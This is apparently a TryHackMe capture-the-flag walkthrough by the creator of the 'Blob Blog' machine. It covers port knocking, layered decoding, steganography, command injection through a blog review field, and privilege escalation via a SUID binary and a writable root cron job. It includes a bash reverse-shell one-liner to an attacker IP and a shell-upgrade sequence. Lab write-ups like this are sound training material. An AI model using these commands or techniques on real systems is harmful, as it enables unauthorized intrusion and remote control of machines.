Welcome to my walkthrough of the first machine I've created! This box is something I'd consider medium/hard on THM:
Scanning & Enumeration
As always, we begin with enumerating the machine ports and services. I use my personal script to obtain the open ports with Threader3000 and then scan the open ones with nmap:
nmap -T4 -Pn -p22,80 -A 10.10.125.198Enumerating Services
Port 22- ssh
Even though ssh is open, I leave that alone for now, as I probably won't be able to exploit it unless I find some credentials.
Port 80- http
A web server, aka a CTF gold mine, let's check that out:
When we visit the page, we just get a default webpage, so nothing interesting. Directory busting on this website, I don't get any results. If we look a little deeper though (at the source code), we find something interesting:
That looks like some encoded information. Bring that to cyber chef and base 64 decoding it we get this:
Huh, looks like it's encoded again. This time in a language called BrainF**k. So let's go try to decode that as well:
The decoded message talks about knocking and gives us 3 numbers. It's most likely talking about port knocking. Trying that out with this command:
knock 10.10.125.198 {ports, space separated}And then scanning the box again:
We get a bunch of open ports now! Let's enumerate again.
Ports 22 & 80 we'll skip since we already did that.
Port 21- ftp
Checking if anonymous login is allowed on the ftp port, it's not, so we either have to move on or search for some credentials somewhere. If you actually enumerate port 80 more, you'll find some extra information in the source code on the bottom of the page:
Luckily, whoever left this there was nice enough to tell us the password is encoded. We can actually also gain that the username to log in wherever these credentials are used is 'Bob'.
Going to decode that password we get:
Now trying these credentials on the ftp server we find ourselves successful:
Searching for Credentials
The first thing I try to do when getting a picture is extract any information that may be hidden:
Unfortunately it seems we need a password. We probably have to do some more enumeration to find it. Heading out to the other ports that were open:
Port 445: http
It is actually an http server, and not SMB on port 445 here. Enumerating this with dirsearch, I found something, but I'll leave that for you to explore. So instead, looking that the source code again:
We're given a password. Using that password on the picture:
steghide extract -sf cool.jpegNow we have what looks like a vigenere cipher and what might be a directory. Trying that directory out on the different webservers, we get a hit on 445:
In Bob's safe stuff, it looks like we're given something else. Since we guessed from before that it's a vigenere cipher, let's try this out as the key for the cipher:
I use the website cryptii to do this and using the information we found to decode the cipher, we get Bob's credentials! Now we need to figure out how to use them...
Vulnerable WebApp
Port 8080- http
The last place we have yet to look, let's head out to port 8080. When we visit it, it's yet another default apache webpage. But, this time, enumerating the site with dirsearch we have some results!
python3 /opt/dirsearch/dirsearch.py -u 10.10.125.198:8080 -e * -rVisiting any of these, we are redirected to the login page. Using the credentials we decoded from the ftp picture, we try to log in:
And we are able!
Enumerating this I don't find anything too interesting, except, maybe, the review page which shows someone crushing pretty hard on the maker of this blog/box:
Seeing that we have an input bar, I always check if I have any code execution. By populating the review field with a simple:
lsAnd then visiting the review webpage:
And we do have code execution! Now let's see if we're able to get a reverse shell. You can find a reverse shell one-liner in a lot of places, I like to use pentest monkey's:
bash -i >& /dev/tcp/10.9.1.161/4444 0>&1
Once we visit the review page we successfully have a reverse shell and access to the machine! The first thing I do when getting a limited shell is upgrade it to a full shell using this:
python -c "import pty;pty.spawn('/bin/bash')"
ctrl+z
stty raw -echo
fg
fg
export TERM=xterm-256colorPrivesc to User
Now that we have access as www-data, it doesn't look like we actually have access to anything useful, or can access the user's home directory. So I look around for something that may lead to privesc. The first thing I always like to look at is sudo privileges. Unfortunately, we had none here. The next thing I like to look for is SUID binaries. I do that with this command:
find / -perm -4000 2>/dev/nullLooking at that list, most of that looks pretty normal, except for `blogFeeback`, that's definitely out of place. Running it to see what it does for us:
It doesn't seem like it does much. So let's try some reverse engineering! I like doing RE with ghidra. So to do that, I have to get the blog over to my kali machine:
I do that with a python server on the target machine and retrieve it with a wget on my attacker machine. Once this is done, I use ghidra to inspect the binary:
It looks like the program is actually spawning a shell if certain conditions are met. Looking closely at the code, it's looping from 1-7, and then taking 7- whatever is in that loop and checking it with an input. If the input doesn't properly match, it exits the program. On each iteration, `iVar1` is shifting to the next parameter being inputted. This means it's looking for 6 parameters in reverse order to be able to get to that shell spawn. So trying this on the binary:
We get user! And we can now read the user flag:
Privesc to Root
While escalating to user, you should have noticed a weird message being printed out periodically:
That's a scheduled process since it's happening every so often. I can't find something that's printing that looking at the normal crontab, so I bring pspy over instead and wait for a message to print to see where that is coming from:
Getting pspy
I made it executable and then ran it and eventually saw this:
chmod +x pspy64
./pspy64
/bin/sh -c gcc /home/bobloblaw/Documents/.boring_file.c -o /home/bobloblaw/Documents/.also_boring/.still_boring && chmod +x /home/bobloblaw/Documents/.also_boring/.still_boring && /home/bobloblaw/Documents/.also_boring/.still_boring | tee /dev/pts/0 /dev/pts/1 /dev/pts/2 && rm /home/bobloblaw/.also_boring/.still_boringThat's very hard to see, but what the process seems to be doing is compiling a C file, changing it to executable, running it, and then deleting it. The key here, though, is that it's being run as root! So we have found our escalation path. If we have access to that file and can write to it, we can upload a reverse shell. Let's check if that's the case:
I was able to find the file, and looking at the permissions, user `bobloblaw` indeed has write permissions! Now I scoured the internet for a C reverse shell and found one. I'll leave that to you and your googling skills to find your own C reverse shell :)
Instead of copying line by line, I just removed the file on the target machine and downloaded this one in its place and used the same name:
Setting up a listener and waiting a bit we get our root shell!
Bonus
There were a good amount of rabbit holes on this box, so good job if you were able to complete it without falling too deeply down them! There is also an alternate way to get directly to user without needing to privesc from www-data, but I'd like to see if anyone can figure that one out. If you do, hit me up on Discord and I'll give you a cookie or something.
I've created a blog post on how to create a vulnerable machine as well, detailing how I made this one. For those of you interested in creating one of these machines, be sure to check that out! It's titled 'The making of a Vulnerable Machine (Blob Blog)'.
That's all for now, if there are any questions about anything that was done, feel free reach me either on the THM webiste or their discord server under the name bobloblaw!
Thanks for reading and doing my box, I sincerely hope you enjoyed it!
Comments